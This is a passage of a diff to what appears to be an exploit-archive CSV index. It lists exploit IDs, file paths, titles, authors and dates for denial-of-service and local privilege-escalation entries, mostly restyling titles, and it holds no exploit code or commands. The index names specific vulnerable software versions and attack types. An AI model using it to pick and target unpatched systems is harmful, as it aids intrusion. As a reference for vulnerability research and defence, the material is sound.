Directory Request Remote Denial of Service",2004-02-05,intuit,windows,dos,0 -23656,platforms/multiple/dos/23656.txt,"Oracle 9.x - Database Parameter / Statement Buffer Overflow",2003-02-05,NGSSoftware,multiple,dos,0 +23656,platforms/multiple/dos/23656.txt,"Oracle 9.x - 'Database' / Statement Buffer Overflow",2003-02-05,NGSSoftware,multiple,dos,0 23660,platforms/windows/dos/23660.c,"BolinTech DreamFTP Server 1.0 - User Name Format String",2004-02-07,shaun2k2,windows,dos,0 23662,platforms/linux/dos/23662.c,"Nadeo Game Engine - Remote Denial of Service",2004-02-09,scrap,linux,dos,0 23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 - 'results.stm' POST Buffer Overflow",2004-02-09,nd@felinemenace.org,windows,dos,0 @@ -3150,7 +3152,7 @@ id,file,description,date,author,platform,type,port 24013,platforms/multiple/dos/24013.txt,"Macromedia ColdFusion MX 6.0 - Oversized Error Message Denial of Service",2004-04-17,"K. K. Mookhey",multiple,dos,0 24022,platforms/windows/dos/24022.txt,"Nero MediaHome 4.5.8.0 - Denial of Service",2013-01-10,"High-Tech Bridge SA",windows,dos,0 24023,platforms/hardware/dos/24023.py,"Colloquy 1.3.5/1.3.6 - Denial of Service",2013-01-10,UberLame,hardware,dos,0 -24029,platforms/windows/dos/24029.pl,"RhinoSoft Serv-U FTP Server 3.x/4.x/5.0 - LIST Parameter Buffer Overflow",2004-04-20,storm,windows,dos,0 +24029,platforms/windows/dos/24029.pl,"RhinoSoft Serv-U FTP Server 3.x/4.x/5.0 - 'LIST' Buffer Overflow",2004-04-20,storm,windows,dos,0 24042,platforms/windows/dos/24042.txt,"Yahoo! Messenger 5.6 - 'YInsthelper.dll' Multiple Buffer Overflow Vulnerabilities",2004-04-23,"Rafel Ivgi The-Insider",windows,dos,0 24051,platforms/windows/dos/24051.txt,"Microsoft Windows XP/2000/NT 4.0 - Shell Long Share Name Buffer Overrun",2004-04-25,"Rodrigo Gutierrez",windows,dos,0 24066,platforms/multiple/dos/24066.txt,"DiGi WWW Server 1 - Remote Denial of Service",2004-04-27,"Donato Ferrante",multiple,dos,0 @@ -3200,7 +3202,7 @@ id,file,description,date,author,platform,type,port 24319,platforms/windows/dos/24319.txt,"Aloaha PDF Crypter (3.5.0.1164) - ActiveX Arbitrary File Overwrite",2013-01-24,shinnai,windows,dos,0 24343,platforms/windows/dos/24343.txt,"MailEnable 1.1x - Content-Length Denial of Service",2004-07-30,CoolICE,windows,dos,0 24344,platforms/hardware/dos/24344.txt,"U.S. Robotics USR808054 Wireless Access Point - Web Administration Denial of Service",2004-08-02,"Albert Puigsech Galicia",hardware,dos,0 -24346,platforms/linux/dos/24346.txt,"Mozilla 1.x - and Netscape 7.0/7.1 SOAPParameter Integer Overflow",2004-08-02,zen-parse,linux,dos,0 +24346,platforms/linux/dos/24346.txt,"Mozilla 1.x / Netscape 7.0/7.1 - SOAP Integer Overflow",2004-08-02,zen-parse,linux,dos,0 24351,platforms/multiple/dos/24351.c,"Free Web Chat Initial Release - UserManager.java Null Pointer Denial of Service",2004-08-04,"Donato Ferrante",multiple,dos,0 24352,platforms/multiple/dos/24352.java,"Free Web Chat Initial Release - Connection Saturation Denial of Service",2004-08-04,"Donato Ferrante",multiple,dos,0 24355,platforms/linux/dos/24355.txt,"GNU Info 4.7 - Follow XRef Buffer Overrun",2004-08-06,"Josh Martin",linux,dos,0 @@ -3233,10 +3235,10 @@ id,file,description,date,author,platform,type,port 24586,platforms/windows/dos/24586.txt,"Gearbox Software Halo Combat Evolved 1.x - Game Server Remote Denial of Service",2004-09-09,"Luigi Auriemma",windows,dos,0 24590,platforms/linux/dos/24590.txt,"Apache mod_ssl 2.0.x - Remote Denial of Service",2004-09-10,"M. _Alex_ Hankins",linux,dos,0 24592,platforms/multiple/dos/24592.txt,"Pingtel Xpressa 1.2.x/2.0/2.1 - Handset Remote Denial of Service",2004-09-13,@stake,multiple,dos,0 -24593,platforms/unix/dos/24593.txt,"QNX Photon phrelay-cfg - -s Parameter Overflow",2004-09-13,"Julio Cesar Fort",unix,dos,0 -24594,platforms/unix/dos/24594.txt,"QNX Photon phlocale - -s Parameter Overflow",2004-09-13,"Julio Cesar Fort",unix,dos,0 -24595,platforms/unix/dos/24595.txt,"QNX Photon input-cfg - -s Parameter Overflow",2004-09-13,"Julio Cesar Fort",unix,dos,0 -24596,platforms/unix/dos/24596.txt,"QNX Photon pkg-installer - -s Parameter Overflow",2004-09-13,"Julio Cesar Fort",unix,dos,0 +24593,platforms/unix/dos/24593.txt,"QNX Photon phrelay-cfg - '-s' Overflow",2004-09-13,"Julio Cesar Fort",unix,dos,0 +24594,platforms/unix/dos/24594.txt,"QNX Photon phlocale - '-s' Overflow",2004-09-13,"Julio Cesar Fort",unix,dos,0 +24595,platforms/unix/dos/24595.txt,"QNX Photon input-cfg - '-s' Overflow",2004-09-13,"Julio Cesar Fort",unix,dos,0 +24596,platforms/unix/dos/24596.txt,"QNX Photon pkg-installer - '-s' Overflow",2004-09-13,"Julio Cesar Fort",unix,dos,0 24597,platforms/multiple/dos/24597.txt,"Mozilla Browser 1.7.x - Non-ASCII Hostname Heap Overflow",2004-09-14,"Mats Palmgren and Gael Delalleau",multiple,dos,0 24599,platforms/linux/dos/24599.txt,"CUPS 1.1.x - UDP Packet Remote Denial of Service",2004-09-15,"Alvaro Martinez Echevarria",linux,dos,0 24605,platforms/windows/dos/24605.txt,"Microsoft Windows XP - 'explorer.exe .tiff' Image Denial of Service",2004-09-16,"Jason Summers",windows,dos,0 @@ -3329,7 +3331,7 @@ id,file,description,date,author,platform,type,port 25107,platforms/hardware/dos/25107.txt,"Check Point VPN-1 SecureClient - Malformed IP Address Local Memory Access",2005-02-16,"Wang Ning",hardware,dos,0 25124,platforms/hardware/dos/25124.txt,"Thomson TCW690 Cable Modem ST42.03.0a - GET Denial of Service",2005-02-19,MurDoK,hardware,dos,0 25128,platforms/windows/dos/25128.txt,"Easy Icon Maker 5.01 - Crash (PoC)",2013-05-01,Asesino04,windows,dos,0 -25135,platforms/windows/dos/25135.txt,"Syslog Watcher Pro 2.8.0.812 - (Date Parameter) Cross-Site Scripting",2013-05-01,demonalex,windows,dos,0 +25135,platforms/windows/dos/25135.txt,"Syslog Watcher Pro 2.8.0.812 - 'Date' Cross-Site Scripting",2013-05-01,demonalex,windows,dos,0 25140,platforms/windows/dos/25140.txt,"WPS Office - 'Wpsio.dll' Stack Buffer Overflow",2013-05-01,Zhangjiantao,windows,dos,0 25164,platforms/linux/dos/25164.txt,"Gaim 1.1.3 - File Download Denial of Service",2005-02-25,"Randall Perry",linux,dos,0 25165,platforms/multiple/dos/25165.c,"Stormy Studios KNet 1.x - Remote Buffer Overflow",2005-02-26,Expanders,multiple,dos,0 @@ -3472,7 +3474,7 @@ id,file,description,date,author,platform,type,port 26835,platforms/hardware/dos/26835.txt,"Scientific Atlanta DPX2100 Cable Modem - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 26869,platforms/windows/dos/26869.txt,"Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption Vulnerabilities (MS06-012)",2005-12-19,ad@heapoverflow.com,windows,dos,0 26886,platforms/linux/dos/26886.pl,"Squid 3.3.5 - Denial of Service (PoC)",2013-07-16,kingcope,linux,dos,0 -26887,platforms/linux/dos/26887.rb,"rpcbind - (CALLIT procedure) UDP Crash (PoC)",2013-07-16,"Sean Verity",linux,dos,0 +26887,platforms/linux/dos/26887.rb,"rpcbind - CALLIT procedure UDP Crash (PoC)",2013-07-16,"Sean Verity",linux,dos,0 26891,platforms/windows/dos/26891.py,"Light Audio Mixer 1.0.12 - '.wav' Crash (PoC)",2013-07-16,ariarat,windows,dos,0 26892,platforms/windows/dos/26892.py,"Kate's Video Toolkit 7.0 - '.wav' Crash (PoC)",2013-07-16,ariarat,windows,dos,0 26915,platforms/linux/dos/26915.txt,"Blender BlenLoader 2.x - File Processing Integer Overflow",2005-12-20,"Damian Put",linux,dos,0 @@ -3813,7 +3815,7 @@ id,file,description,date,author,platform,type,port 30194,platforms/windows/dos/30194.txt,"Apple Safari 3 for Windows - 'Document.Location' Denial of Service",2007-06-16,azizov,windows,dos,0 30224,platforms/windows/dos/30224.py,"Ingress Database Server 2.6 - Multiple Remote Vulnerabilities",2007-06-21,anonymous,windows,dos,0 30233,platforms/windows/dos/30233.pl,"LiteWEB Web Server 2.7 - Invalid Page Remote Denial of Service",2007-06-25,Prili,windows,dos,0 -30251,platforms/linux/dos/30251.c,"GD Graphics Library 2.0.34 - (libgd) gdImageCreateXbm Function Unspecified Denial of Service",2007-06-26,anonymous,linux,dos,0 +30251,platforms/linux/dos/30251.c,"GD Graphics Library 2.0.34 - 'libgd' gdImageCreateXbm Function Unspecified Denial of Service",2007-06-26,anonymous,linux,dos,0 30252,platforms/windows/dos/30252.py,"Conti FTP Server 1.0 - Large String Denial of Service",2007-06-27,35c666,windows,dos,0 30255,platforms/windows/dos/30255.txt,"PC SOFT WinDEV 11 - WDP File Parsing Stack Buffer Overflow",2007-06-28,"Jerome Athias",windows,dos,0 40743,platforms/windows/dos/40743.html,"VBScript 5.8.7600.16385/5.8.9600.16384 - RegExpComp::PnodeParse Out-of-Bounds Read",2016-11-09,Skylined,windows,dos,0 @@ -3930,7 +3932,7 @@ id,file,description,date,author,platform,type,port 31128,platforms/multiple/dos/31128.txt,"IEA Software (Multiple Products) - POST Denial of Service",2008-02-08,"Luigi Auriemma",multiple,dos,0 31136,platforms/multiple/dos/31136.txt,"cyan soft - Multiple Applications Format String / Denial of Service Vulnerabilities",2008-02-11,"Luigi Auriemma",multiple,dos,0 31138,platforms/windows/dos/31138.txt,"Larson Network Print Server 9.4.2 build 105 (LstNPS) - 'NPSpcSVR.exe' License Command Remote Overflow",2008-02-11,"Luigi Auriemma",windows,dos,0 -31139,platforms/windows/dos/31139.txt,"Larson Network Print Server 9.4.2 build 105 - (LstNPS) Logging Function USEP Command Remote Format String",2008-02-11,"Luigi Auriemma",windows,dos,0 +31139,platforms/windows/dos/31139.txt,"Larson Network Print Server 9.4.2 build 105 - 'LstNPS' Logging Function USEP Command Remote Format String",2008-02-11,"Luigi Auriemma",windows,dos,0 31148,platforms/multiple/dos/31148.txt,"Opium OPI Server and CyanPrintIP - Format String / Denial of Service",2008-02-11,"Luigi Auriemma",multiple,dos,0 31150,platforms/multiple/dos/31150.txt,"RPM Remote Print Manager 4.5.1 - Service Remote Buffer Overflow",2008-02-11,"Luigi Auriemma",multiple,dos,0 31306,platforms/hardware/dos/31306.txt,"Nortel UNIStim IP Phone - Remote Ping Denial of Service",2008-02-26,sipherr,hardware,dos,0 @@ -4447,6 +4449,7 @@ id,file,description,date,author,platform,type,port 35600,platforms/linux/dos/35600.c,"Linux Kernel 2.6.x - 'inotify_init1()' Double-Free Local Denial of Service",2011-04-11,anonymous,linux,dos,0 35613,platforms/multiple/dos/35613.py,"TOTVS ERP Microsiga Protheus 8/10 - Memory Corruption (Denial of Service)",2011-04-13,waKKu,multiple,dos,0 35622,platforms/windows/dos/35622.txt,"Wickr Desktop 2.2.1 Windows - Denial of Service",2014-12-27,Vulnerability-Lab,windows,dos,0 +35637,platforms/android/dos/35637.py,"WhatsApp 2.11.476 (Android) - Remote Reboot/Crash App (Denial of Service)",2014-12-28,"Daniel Godoy",android,dos,0 35656,platforms/windows/dos/35656.pl,"eXPert PDF 7.0.880.0 - '.pj' Heap Based Buffer Overflow",2011-04-25,KedAns-Dz,windows,dos,0 35654,platforms/windows/dos/35654.py,"AT-TFTP Server 1.8 - 'Read' Request Remote Denial of Service",2011-04-25,"Antu Sanadi",windows,dos,0 35725,platforms/multiple/dos/35725.pl,"Perl 5.10 - Multiple Null Pointer Dereference Denial of Service Vulnerabilities",2011-05-03,"Jonathan Brossard",multiple,dos,0 @@ -4579,7 +4582,7 @@ id,file,description,date,author,platform,type,port 37348,platforms/windows/dos/37348.txt,"Photoshop CC2014 / Bridge CC 2014 - '.png' Parsing Memory Corruption",2015-06-23,"Francis Provencher",windows,dos,0 37386,platforms/osx/dos/37386.php,"Apple Mac OSX 10.10.3 (Yosemite) Safari 8.0.x - Crash (PoC)",2015-06-26,"Mohammad Reza Espargham",osx,dos,0 37566,platforms/php/dos/37566.php,"PHP 5.4.3 - PDO Memory Access Violation Denial of Service",2012-08-02,0x721427D8,php,dos,0 -37456,platforms/windows/dos/37456.html,"McAfee SiteAdvisor 3.7.2 - (firefox) Use-After-Free (PoC)",2015-07-01,"Marcin Ressel",windows,dos,0 +37456,platforms/windows/dos/37456.html,"McAfee SiteAdvisor 3.7.2 - Firefox Use-After-Free (PoC)",2015-07-01,"Marcin Ressel",windows,dos,0 37458,platforms/windows/dos/37458.pl,"Winamp 5.13 - '.m3u' File Exception Handling Remote Denial of Service",2012-06-25,Dark-Puzzle,windows,dos,0 37462,platforms/windows/dos/37462.pl,"VideoLAN VLC Media Player 2.0.1 - '.avi' File Denial of Service",2012-06-28,Dark-Puzzle,windows,dos,0 37463,platforms/windows/dos/37463.pl,"Real Networks RealPlayer - '.avi' File Divide-by-Zero Denial of Service",2012-06-28,Dark-Puzzle,windows,dos,0 @@ -4599,8 +4602,8 @@ id,file,description,date,author,platform,type,port 37568,platforms/windows/dos/37568.pl,"VideoLAN VLC Media Player 2.0.2 - '.3gp' File Divide-by-Zero Denial of Service",2012-08-02,Dark-Puzzle,windows,dos,0 37593,platforms/windows/dos/37593.py,"Full Player 8.2.1 - Memory Corruption (PoC)",2015-07-13,"SATHISH ARTHAR",windows,dos,0 37607,platforms/windows/dos/37607.py,"Internet Download Manager - '.ief' Crash (PoC)",2015-07-14,"Mohammad Reza Espargham",windows,dos,0 -37608,platforms/windows/dos/37608.py,"Internet Download Manager - (Find Download) Crash (PoC)",2015-07-14,"Mohammad Reza Espargham",windows,dos,0 -37612,platforms/windows/dos/37612.py,"ZOC Terminal Emulator 7 - (Quick Connection) Crash (PoC)",2015-07-14,"SATHISH ARTHAR",windows,dos,0 +37608,platforms/windows/dos/37608.py,"Internet Download Manager - Find Download Crash (PoC)",2015-07-14,"Mohammad Reza Espargham",windows,dos,0 +37612,platforms/windows/dos/37612.py,"ZOC Terminal Emulator 7 - Quick Connection Crash (PoC)",2015-07-14,"SATHISH ARTHAR",windows,dos,0 37639,platforms/multiple/dos/37639.html,"Mozilla Firefox - Remote Denial of Service",2012-08-17,"Jean Pascal Pereira",multiple,dos,0 37640,platforms/windows/dos/37640.pl,"Divx Player 6.8.2 - Denial of Service",2012-08-20,Dark-Puzzle,windows,dos,0 37660,platforms/ios/dos/37660.txt,"Image Transfer IOS - Remote Crash (PoC)",2015-07-20,"Mohammad Reza Espargham",ios,dos,0 @@ -4622,7 +4625,7 @@ id,file,description,date,author,platform,type,port 37739,platforms/windows/dos/37739.py,"Dell Netvault Backup 10.0.1.24 - Denial of Service",2015-08-07,"Josep Pi Rodriguez",windows,dos,20031 37741,platforms/osx/dos/37741.txt,"Apple Mac OSX Keychain - EXC_BAD_ACCESS Denial of Service",2015-08-08,"Juan Sacco",osx,dos,0 37743,platforms/linux/dos/37743.pl,"Brasero - Crash (PoC)",2015-08-08,"Mohammad Reza Espargham",linux,dos,0 -37759,platforms/linux/dos/37759.py,"NeuroServer 0.7.4 - (EEG TCP/IP Transceiver) Remote Denial of Service",2015-08-12,nitr0us,linux,dos,0 +37759,platforms/linux/dos/37759.py,"NeuroServer 0.7.4 - EEG TCP/IP Transceiver Remote Denial of Service",2015-08-12,nitr0us,linux,dos,0 37763,platforms/windows/dos/37763.txt,"NetServe FTP Client 1.0 - Local Denial of Service (Overflow)",2015-08-12,Un_N0n,windows,dos,0 37764,platforms/windows/dos/37764.html,"Microsoft Internet Explorer - CTreeNode::GetCascadedLang Use-After-Free (MS15-079)",2015-08-12,"Blue Frost Security GmbH",windows,dos,0 37766,platforms/multiple/dos/37766.py,"Google Chrome 43.0 - Certificate MIME Handling Integer Overflow",2015-08-13,"Paulos Yibelo",multiple,dos,0 @@ -5098,7 +5101,7 @@ id,file,description,date,author,platform,type,port 39657,platforms/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos,0 39663,platforms/windows/dos/39663.html,"Microsoft Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)",2016-04-05,"Google Security Research",windows,dos,0 39669,platforms/lin_x86/dos/39669.txt,"Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco and Ismael Ripoll",lin_x86,dos,0 -39685,platforms/android/dos/39685.txt,"Google Android - IOMX getConfig/getParameter Information Disclosure",2016-04-11,"Google Security Research",android,dos,0 +39685,platforms/android/dos/39685.txt,"Google Android - IOMX 'getConfig'/'getParameter' Information Disclosure",2016-04-11,"Google Security Research",android,dos,0 39686,platforms/android/dos/39686.txt,"Google Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos,0 39699,platforms/windows/dos/39699.html,"Microsoft Internet Explorer 11 - MSHTML!CMarkupPointer::UnEmbed Use-After-Free",2016-04-15,"Marcin Ressel",windows,dos,0 39706,platforms/hardware/dos/39706.txt,"TH692 Outdoor P2P HD Waterproof IP Camera - Hard-Coded Credentials",2016-04-18,DLY,hardware,dos,0 @@ -5360,6 +5363,7 @@ id,file,description,date,author,platform,type,port 41042,platforms/windows/dos/41042.html,"Mozilla Firefox < 50.1.0 - Use-After-Free",2017-01-13,"Marcin Ressel",windows,dos,0 41142,platforms/unix/dos/41142.c,"SunOS 5.11 ICMP - Denial of Service",2017-01-22,"Todor Donev",unix,dos,0 41145,platforms/multiple/dos/41145.py,"Oracle OpenJDK Runtime Environment 1.8.0_112-b15 - Java Serialization Denial Of Service",2017-01-23,ERPScan,multiple,dos,0 +41160,platforms/windows/dos/41160.py,"Autodesk Backburner Manager 3 < 2016.0.0.2150 - Null Dereference Denial of Service",2017-01-26,b0nd,windows,dos,0 41161,platforms/android/dos/41161.txt,"Google Android - 'pm_qos' KASLR Bypass",2017-01-26,"Google Security Research",android,dos,0 41163,platforms/multiple/dos/41163.txt,"macOS 10.12.1 / iOS 10.2 - Kernel Userspace Pointer Memory Corruption",2017-01-26,"Google Security Research",multiple,dos,0 41164,platforms/multiple/dos/41164.c,"macOS 10.12.1 / iOS Kernel - 'IOService::matchPassive' Use-After-Free",2017-01-26,"Google Security Research",multiple,dos,0 @@ -5620,7 +5624,7 @@ id,file,description,date,author,platform,type,port 42302,platforms/windows/dos/42302.txt,"Firefox 54.0.1 - Denial of Service",2017-07-07,hyp3rlinx,windows,dos,0 42336,platforms/windows/dos/42336.html,"Microsoft Internet Explorer 11.0.9600.18617 - 'CMarkup::DestroySplayTree' Memory Corruption",2017-07-18,"Google Security Research",windows,dos,0 42337,platforms/windows/dos/42337.html,"Microsoft Internet Explorer 11.1066.14393.0 - VBScript Arithmetic Functions Type Confusion",2017-07-18,"Google Security Research",windows,dos,0 -42338,platforms/windows/dos/42338.cpp,"Microsoft Windows Kernel - 'IOCTL 0x120007 (NsiGetParameter)' nsiproxy/netio Pool Memory Disclosure",2017-07-18,"Google Security Research",windows,dos,0 +42338,platforms/windows/dos/42338.cpp,"Microsoft Windows Kernel - 'IOCTL 0x120007 NsiGetParameter' nsiproxy/netio Pool Memory Disclosure",2017-07-18,"Google Security Research",windows,dos,0 42360,platforms/multiple/dos/42360.html,"WebKit - 'WebCore::AccessibilityNodeObject::textUnderElement' Use-After-Free",2017-07-24,"Google Security Research",multiple,dos,0 42361,platforms/multiple/dos/42361.html,"WebKit - 'WebCore::AccessibilityRenderObject::handleAriaExpandedChanged' Use-After-Free",2017-07-24,"Google Security Research",multiple,dos,0 42362,platforms/multiple/dos/42362.html,"WebKit - 'WebCore::Node::nextSibling' Use-After-Free",2017-07-24,"Google Security Research",multiple,dos,0 @@ -5715,6 +5719,7 @@ id,file,description,date,author,platform,type,port 43001,platforms/windows/dos/43001.cpp,"Microsoft Windows - 'nt!NtQueryObject (ObjectNameInformation)' Kernel Pool Memory Disclosure",2017-10-17,"Google Security Research",windows,dos,0 43010,platforms/linux/dos/43010.c,"Linux Kernel - 'AF_PACKET' Use-After-Free",2017-10-17,SecuriTeam,linux,dos,0 43014,platforms/linux/dos/43014.txt,"Xen - Unbounded Recursion in Pagetable De-typing",2017-10-18,"Google Security Research",linux,dos,0 +43020,platforms/multiple/dos/43020.txt,"Mozilla Firefox < 55 - Denial of Service",2017-10-20,"Amit Sangra",multiple,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -5786,7 +5791,7 @@ id,file,description,date,author,platform,type,port 256,platforms/solaris/local/256.c,"Solaris 2.6/2.7 - '/usr/bin/write' Local Overflow",2001-01-25,"Pablo Sor",solaris,local,0 257,platforms/linux/local/257.pl,"jaZip 0.32-2 - Local Buffer Overflow",2001-01-25,teleh0r,linux,local,0 258,platforms/linux/local/258.sh,"glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - Exploits",2001-01-25,krochos,linux,local,0 -259,platforms/tru64/local/259.c,"Tru64 5 - (su) Env Local Stack Overflow",2001-01-26,K2,tru64,local,0 +259,platforms/tru64/local/259.c,"Tru64 5 - 'su' Env Local Stack Overflow",2001-01-26,K2,tru64,local,0 260,platforms/linux/local/260.c,"splitvt < 1.6.5 - Local Exploit",2001-01-26,"Michel Kaempf",linux,local,0 261,platforms/sco/local/261.c,"SCO OpenServer 5.0.5 - Env Local Stack Overflow",2001-01-26,K2,sco,local,0 265,platforms/irix/local/265.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Exploit",2001-05-07,LSD-PLaNET,irix,local,0 @@ -5798,7 +5803,7 @@ id,file,description,date,author,platform,type,port 285,platforms/linux/local/285.c,"Slackware 7.1 - '/usr/bin/mail' Local Exploit",2001-03-03,kengz,linux,local,0 286,platforms/bsd/local/286.c,"FreeBSD 3.5.1/4.2 - ports package xklock Privilege Escalation",2001-03-03,dethy,bsd,local,0 287,platforms/bsd/local/287.c,"FreeBSD 3.5.1/4.2 - Ports Package elvrec Privilege Escalation",2001-03-03,dethy,bsd,local,0 -288,platforms/multiple/local/288.c,"Progress Database Server 8.3b - (prodb) Privilege Escalation",2001-03-04,"the itch",multiple,local,0 +288,platforms/multiple/local/288.c,"Progress Database Server 8.3b - 'prodb' Privilege Escalation",2001-03-04,"the itch",multiple,local,0 290,platforms/linux/local/290.sh,"GLIBC 2.1.3 - LD_PRELOAD Local Exploit",2001-03-04,Shadow,linux,local,0 302,platforms/unix/local/302.c,"UNIX 7th Edition /bin/mkdir - Local Buffer Overflow",2004-06-25,anonymous,unix,local,0 317,platforms/linux/local/317.txt,"Resolv+ (RESOLV_HOST_CONF) - Linux Library Local Exploit",1996-01-01,"Jared Mauch",linux,local,0 @@ -5856,7 +5861,7 @@ id,file,description,date,author,platform,type,port 591,platforms/linux/local/591.c,"socat 1.4.0.2 - Local Format String (not setuid)",2004-10-23,CoKi,linux,local,0 600,platforms/linux/local/600.c,"GD Graphics Library - Heap Overflow (PoC)",2004-10-26,anonymous,linux,local,0 601,platforms/linux/local/601.c,"libxml 2.6.12 nanoftp - Remote Buffer Overflow (PoC)",2004-10-26,infamous41md,linux,local,0 -602,platforms/sco/local/602.c,"SCO OpenServer 5.0.7 - (MMDF deliver) Privilege Escalation",2004-10-26,"Ramon Valle",sco,local,0 +602,platforms/sco/local/602.c,"SCO OpenServer 5.0.7 - MMDF deliver Privilege Escalation",2004-10-26,"Ramon Valle",sco,local,0 624,platforms/linux/local/624.c,"Linux Kernel 2.4.27/2.6.8 - 'binfmt_elf' Executable File Read Exploit",2004-11-10,"Paul Starzetz",linux,local,0 629,platforms/multiple/local/629.c,"Multiple AntiVirus - '.zip' Detection Bypass Exploit",2004-11-14,oc192,multiple,local,0 657,platforms/linux/local/657.c,"atari800 - Privilege Escalation",2004-11-25,pi3,linux,local,0 @@ -5912,7 +5917,7 @@ id,file,description,date,author,platform,type,port 890,platforms/linux/local/890.pl,"PostScript Utilities - psnup Argument Buffer Overflow",2005-03-21,lammat,linux,local,0 895,platforms/linux/local/895.c,"Linux Kernel 2.4.x/2.6.x - 'uselib()' Privilege Escalation (3)",2005-03-22,sd,linux,local,0 896,platforms/osx/local/896.c,"Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Buffer Overflow Privilege Escalation",2005-03-22,vade79,osx,local,0 -898,platforms/aix/local/898.sh,"AIX 5.3.0 - (invscout) Local Command Execution",2005-03-25,ri0t,aix,local,0 +898,platforms/aix/local/898.sh,"AIX 5.3.0 - 'invscout' Local Command Execution",2005-03-25,ri0t,aix,local,0 905,platforms/windows/local/905.c,"BakBone NetVault 6.x/7.x - Local Stack Buffer Overflow",2005-04-01,class101,windows,local,0 912,platforms/windows/local/912.c,"GetDataBack Data Recovery 2.31 - Local Exploit",2005-04-04,Kozan,windows,local,0 913,platforms/linux/local/913.pl,"Aeon 0.2a - Local Linux Exploit (1)",2005-04-05,lammat,linux,local,0 @@ -5958,7 +5963,7 @@ id,file,description,date,author,platform,type,port 1087,platforms/bsd/local/1087.c,"Sudo 1.3.1 < 1.6.8p (OpenBSD) - Pathname Validation Privilege Escalation",2005-07-04,RusH,bsd,local,0 1091,platforms/windows/local/1091.c,"Internet Download Manager 4.0.5 - Input URL Stack Overflow",2005-07-06,c0d3r,windows,local,0 1092,platforms/solaris/local/1092.c,"Solaris (SPARC/x86) - Local Socket Hijack Exploit",2005-07-06,c0ntex,solaris,local,0 -1119,platforms/multiple/local/1119.txt,"vim 6.3 < 6.3.082 - (modlines) Local Command Execution",2005-07-25,"Georgi Guninski",multiple,local,0 +1119,platforms/multiple/local/1119.txt,"vim 6.3 < 6.3.082 - 'modlines' Local Command Execution",2005-07-25,"Georgi Guninski",multiple,local,0 1128,platforms/windows/local/1128.c,"Microsoft Windows - 'LegitCheckControl.dll' Genuine Advantage Validation Patch",2005-08-01,HaCkZaTaN,windows,local,0 1154,platforms/linux/local/1154.pl,"Operator Shell (osh) 1.7-13 - Privilege Escalation",2005-08-16,"Charles Stevenson",linux,local,0 1161,platforms/windows/local/1161.c,"BakBone NetVault 7.1 - Privilege Escalation",2005-04-27,"Reed Arvin",windows,local,0 @@ -5970,7 +5975,7 @@ id,file,description,date,author,platform,type,port 1182,platforms/solaris/local/1182.c,"Solaris 2.6/7/8/9 (SPARC) - 'ld.so.1' Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local,0 1185,platforms/osx/local/1185.pl,"Adobe Version Cue 1.0/1.0.1 (OSX) - Privilege Escalation",2005-08-30,vade79,osx,local,0 1186,platforms/osx/local/1186.c,"Adobe Version Cue 1.0/1.0.1 (OSX) - '-lib' Privilege Escalation",2005-08-30,vade79,osx,local,0 -1187,platforms/linux/local/1187.c,"Gopher 3.0.9 - (+VIEWS) Remote Client-Side Buffer Overflow",2005-08-30,vade79,linux,local,0 +1187,platforms/linux/local/1187.c,"Gopher 3.0.9 - '+VIEWS' Remote Client-Side Buffer Overflow",2005-08-30,vade79,linux,local,0 1197,platforms/windows/local/1197.c,"Microsoft Windows - 'keybd_event' Local Privilege Escalation",2005-09-06,"Andrés Acunha",windows,local,0 1198,platforms/windows/local/1198.c,"Microsoft Windows - CSRSS Privilege Escalation (MS05-018)",2005-09-06,eyas,windows,local,0 1215,platforms/linux/local/1215.c,"Wireless Tools 26 (IWConfig) - Privilege Escalation",2005-09-14,Qnix,linux,local,0 @@ -5984,10 +5989,10 @@ id,file,description,date,author,platform,type,port 1310,platforms/linux/local/1310.txt,"Sudo 1.6.8p9 - SHELLOPTS/PS4 Environment Variables Privilege Escalation",2005-11-09,"Breno Silva Pinto",linux,local,0 1311,platforms/bsd/local/1311.c,"FreeBSD 4.x / < 5.4 - master.passwd Disclosure",2005-11-09,kingcope,bsd,local,0 1316,platforms/linux/local/1316.pl,"Veritas Storage Foundation 4.0 - VCSI18N_LANG Local Overflow",2005-11-12,"Kevin Finisterre",linux,local,0 -1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (x86) - (phgrafx) Local Buffer Overflow",2005-11-30,"p. minervini",qnx,local,0 +1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (x86) - 'phgrafx' Local Buffer Overflow",2005-11-30,"p. minervini",qnx,local,0 1360,platforms/solaris/local/1360.c,"Appfluent Database IDS < 2.1.0.103 - Environment Variable Local Exploit",2005-12-07,c0ntex,solaris,local,0 1397,platforms/linux/local/1397.c,"Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Integer Overflow Privilege Escalation",2005-12-30,alert7,linux,local,0 -1402,platforms/sco/local/1402.c,"SCO OpenServer 5.0.7 - (termsh) Privilege Escalation",2006-01-03,prdelka,sco,local,0 +1402,platforms/sco/local/1402.c,"SCO OpenServer 5.0.7 - 'termsh' Privilege Escalation",2006-01-03,prdelka,sco,local,0 1403,platforms/windows/local/1403.c,"WinRAR 3.30 - Long Filename Buffer Overflow (1)",2006-01-04,K4P0,windows,local,0 1404,platforms/windows/local/1404.c,"WinRAR 3.30 - Long Filename Buffer Overflow (2)",2006-01-04,c0d3r,windows,local,0 1406,platforms/windows/local/1406.php,"PHP 4.4.0 - 